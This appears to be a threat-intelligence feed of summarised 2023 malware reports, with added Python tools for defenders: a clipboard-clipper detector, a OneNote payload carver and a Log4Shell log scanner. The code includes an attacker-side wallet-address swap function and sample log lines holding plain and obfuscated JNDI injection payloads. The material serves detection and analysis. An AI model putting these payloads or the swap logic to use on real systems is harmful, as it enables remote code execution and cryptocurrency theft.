Malicious campaigns targeting the open-source npm ecosystem trigger a flood of spam, SEO poisoning, and malware infections, leading to npm instability and service outages. The operations span malware drops, referral scams tied to AliExpress, and crypto scams, und…
Category: Threat Research
Trustwave SpiderLabs uncovered Rilide, a new malware strain that hijacks Chromium-based browsers by disguising itself as a Google Drive extension and performing a wide range of actions such as monitoring history, taking screenshots, and injecting scripts to st…
Security researchers analyzed a 3CX supply-chain attack and found that manipulated MSI installers of 3CXDesktopApp deliver a malicious DLL which decrypts and executes shellcode, dropping a backdoor named Gopuram along with an infostealer. Attribution points to…
ALPHV Ransomware Affiliate Targets Vulnerable Backup Installations to Gain Initial Access | Mandiant
Mandiant has observed a new ALPHV (aka BlackCat ransomware) ransomware affiliate, tracked as UNC4466, target publicly exposed Veritas Backup Exec installations, vulnerable to CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878, for initial access to victim environments. A commercial Internet scanning service identified over 8,500 installations of Veritas Backup Exec instances that are currently exposed…
Unit 42 uncovered CryptoClippy, a cryptocurrency clipper that targets Portuguese speakers by watching the clipboard for wallet addresses and replacing them with attacker-controlled addresses. The campaign delivers multi-stage PowerShell loaders via malvertisin…
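The clipper technique summarized above comes down to two pieces: a pattern match for wallet-address-shaped strings on the clipboard, and a substitution with an attacker-controlled address of the same type. The block below is an added example, not code from the Unit 42 report, and the address regexes, the attacker addresses and the clipboard history are all constructed for illustration (CryptoClippy's own patterns are not on this page). It shows the swap as the malware performs it and, alongside it, the check a defender would run over a clipboard-write trace: flag any write where one wallet address is replaced by a different address of the same coin type.

```python
import re

# Constructed address shapes a clipper would match (not CryptoClippy's actual regexes).
ADDRESS_PATTERNS = {
    "btc": re.compile(r"\b(bc1[a-z0-9]{25,62}|[13][a-zA-Z0-9]{25,34})\b"),
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}

# Constructed attacker-controlled addresses, one per coin type.
ATTACKER = {
    "btc": "1AttackerExampleAddressYYYYYYYYY",
    "eth": "0x" + "2" * 40,
}

# Constructed clipboard-write trace: victim copies an address, malware overwrites it.
HISTORY = [
    "1VictimExampleAddressXXXXXXXXXX",
    "1AttackerExampleAddressYYYYYYYYY",
    "meeting notes for monday",
    "0x" + "1" * 40,
    "0x" + "2" * 40,
]


def classify(text: str):
    """Return the coin type if the whole clipboard string is a single address, else None."""
    s = text.strip()
    for coin, pat in ADDRESS_PATTERNS.items():
        if pat.fullmatch(s):
            return coin
    return None


def clipper_swap(text: str, attacker: dict) -> str:
    """Attacker side: replace every matched address with the attacker's address of that type."""
    for coin, pat in ADDRESS_PATTERNS.items():
        text = pat.sub(attacker[coin], text)
    return text


def detect_swaps(history: list):
    """Defender side: flag consecutive writes where an address of one coin type is
    replaced by a *different* address of the same type (the clipper's signature)."""
    alerts = []
    for prev, cur in zip(history, history[1:]):
        p, c = classify(prev), classify(cur)
        if p is not None and p == c and prev.strip() != cur.strip():
            alerts.append((p, prev.strip(), cur.strip()))
    return alerts


def demo():
    return detect_swaps(HISTORY)


if __name__ == "__main__":
    for coin, before, after in demo():
        print(f"[!] {coin} address swapped on clipboard: {before} -> {after}")
```

A real monitor would feed `detect_swaps` from OS clipboard-change notifications; the important design point is that it compares successive writes rather than matching a blocklist of attacker addresses, so it catches new addresses without a signature update.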
Microsoft Threat Intelligence ties a destructive operation to MERCURY (also known as Mango Sandstorm) and to DEV-1084 (Storm-1084), detailing how they compromised hybrid on-premises and cloud environments and pursued irreversible disruption rather than ransom.…
ASEC analyzed phishing threats for March 19–25, 2023, finding FakePage attachments as the dominant method, followed by Downloader payloads, Worms, Infostealers, Trojans, and Exploits distributed via email. The report also lists numerous FakePage C2 URLs, commo…
CYFIRMA details FusionCore, a European Malware-as-a-Service and hacker-for-hire group, and analyzes SarinLocker ransomware linked to NecroSys and an affiliate program. The report notes SarinLocker v1.0 is still under development, targets specific file types, e…
Money Message is a newly discovered ransomware family that can encrypt network shares on Windows and Linux, using admin credentials embedded in its configuration to access network resources. It employs double extortion by exfiltrating data before encryption and publishing…
ASEC’s weekly malware statistics for March 27–April 2, 2023 show backdoors dominate at 54.9%, followed by downloaders (22.9%) and infostealers (20.6%), with ransomware and coin miners making up smaller shares. The top families were RedLine, Amadey, AgentTesla,…
Two executables drive the efile.com eFail operation: update.exe acts as a downloader, while the PHP-based backdoor communicates with a remote C2 to fetch and run commands. The campaign uses PyInstaller-packed Python code, a PHP backdoor, and persistence via regis…
Trustwave SpiderLabs analyzes Emotet Epoch 4 resuming spam campaigns, including a shift to OneNote attachments and heavy obfuscation to evade scanners. The post details padding tricks, a highly obfuscated VBA macro (AutoOpen) and a decode routine, plus the ass…
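When a campaign shifts to OneNote attachments, the first triage step is pulling the embedded payloads out of the .one file without opening it. The block below is an added example, not code from the Trustwave post; it relies on the FileDataStoreObject layout from Microsoft's MS-ONESTORE specification (a 16-byte header GUID, an 8-byte little-endian length, 4 unused bytes, 8 reserved bytes, then the file data, then a footer GUID), which is the same carving approach used by public OneNote dump tools. The sample .one-like blob is constructed inline, so the code runs offline.

```python
import struct

# FileDataStoreObject GUIDs from MS-ONESTORE, as they appear on disk (little-endian).
# guidHeader {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
FILE_DATA_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
# guidFooter {71FBA722-0F79-4A0B-BB13-899256426B24}
FILE_DATA_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
HEADER_LEN = 16 + 8 + 4 + 8  # guid + cbLength + unused + reserved = 36 bytes


def extract_embedded_files(data: bytes):
    """Carve every embedded file from a OneNote section and report whether the
    footer GUID followed it (a missing footer suggests truncation or tampering)."""
    found = []
    pos = data.find(FILE_DATA_HEADER)
    while pos != -1:
        if pos + HEADER_LEN > len(data):
            break
        (length,) = struct.unpack_from("<Q", data, pos + 16)
        start, end = pos + HEADER_LEN, pos + HEADER_LEN + length
        if end > len(data):
            break  # declared length runs past EOF: corrupt or deliberately malformed
        footer_ok = data[end:end + 16] == FILE_DATA_FOOTER
        found.append({"offset": start, "data": data[start:end], "footer_ok": footer_ok})
        pos = data.find(FILE_DATA_HEADER, end)
    return found


def classify_payload(blob: bytes) -> str:
    """Cheap magic-byte / keyword hints for triage, not a full file identifier."""
    if blob.startswith(b"MZ"):
        return "pe"
    if blob.startswith(b"%PDF"):
        return "pdf"
    if blob.startswith(b"PK\x03\x04"):
        return "zip/ooxml"
    lowered = blob.lower()
    if lowered.lstrip().startswith(b"<html") or b"<script" in lowered:
        return "hta/html"
    if b"createobject" in lowered or b"wscript" in lowered or b"powershell" in lowered:
        return "script"
    return "unknown"


def build_sample() -> bytes:
    """Constructed .one-like blob with two embedded files (not a real Emotet sample)."""
    def wrap(payload: bytes) -> bytes:
        return (FILE_DATA_HEADER + struct.pack("<Q", len(payload))
                + b"\x00" * 12 + payload + FILE_DATA_FOOTER)
    pe_like = b"MZ\x90\x00" + b"constructed-fake-pe-body"
    vbs_like = b'Set sh = CreateObject("WScript.Shell")\r\nsh.Run "calc.exe"\r\n'
    return b"\x00" * 64 + wrap(pe_like) + b"\xff" * 32 + wrap(vbs_like) + b"\x00" * 16


if __name__ == "__main__":
    for i, item in enumerate(extract_embedded_files(build_sample())):
        print(f"[{i}] offset={item['offset']} size={len(item['data'])} "
              f"type={classify_payload(item['data'])} footer_ok={item['footer_ok']}")
```

Carving on the header GUID rather than parsing the full section structure is deliberate: malicious files often break the higher-level structure while keeping the embedded-file records intact, so the carve still works where a strict parser bails out.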
Royal Ransom began surfacing in 2022 as a private group using multiple ransomware strains and has operated its own ransomware since September 2022. The analysis covers both Windows and Linux variants, their encryption workflow, and an anonymized incident-respo…
Genesis Market, a major underground marketplace for stolen credentials, browser fingerprints, and cookies, was disrupted by a multinational law enforcement operation spanning 17 countries, leading to takedown notices and arrests or contacts with users. The pos…
Mandiant analyzes CVE-2021-44228 (Log4Shell) exploitation against MobileIron Core, detailing four adversaries and their post-exploitation actions. It catalogs IOCs, maps observed behaviors to MITRE techniques, and outlines defensive guidance and validation ste…
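One of the validation steps a defender runs after reading a Log4Shell report is a sweep of request logs for JNDI lookup strings, and the obfuscated forms (`${lower:j}`, `${::-n}`, `${env:X:-d}`, percent-encoding) defeat a naive `${jndi:` grep. The block below is an added example, not code from the Mandiant report: it normalizes Log4j lookup syntax from the innermost brace outward, then matches the resolved `jndi:` scheme. The log lines are constructed for the example and the IPs are documentation addresses; it does not claim to cover every Log4j lookup plugin.

```python
import re
from urllib.parse import unquote

# Innermost ${...} with no nested braces inside; resolved repeatedly until stable.
INNER = re.compile(r"\$\{([^${}]*)\}")
# Resolved JNDI scheme as Log4j would dispatch it.
JNDI = re.compile(r"jndi:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)", re.IGNORECASE)

# Constructed access-log lines; 198.51.100.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:22:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:22:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:22:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${::-d}i:${env:NOPE:-l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:22:12 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fx%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.5 - - [11/Dec/2021:10:22:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy} is not jndi at all"',
]


def _resolve(m: re.Match) -> str:
    body = m.group(1)
    if ":-" in body:                       # default-value form: ${anything:-X} -> X
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":  # ${lower:J} -> j
        return arg.lower()
    if sep and prefix.lower() == "upper":  # ${upper:n} -> N
        return arg.upper()
    return m.group(0)                      # unknown lookup (e.g. jndi, date): leave intact


def normalize(line: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups from the inside out until stable."""
    text = unquote(line)
    for _ in range(max_rounds):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return (1-based line number, normalized line, matched scheme) for each hit."""
    hits = []
    for n, raw in enumerate(lines, 1):
        norm = normalize(raw)
        m = JNDI.search(norm)
        if m:
            hits.append((n, norm, m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for n, norm, scheme in scan(SAMPLE_LOG):
        print(f"line {n}: jndi/{scheme} -> {norm}")
```

Resolving inside-out matters because the obfuscated line only becomes `${jNdi:ldap://...}` after four inner lookups are collapsed; matching the outer `${` first would never see it. The `max_rounds` bound keeps a pathological input from looping.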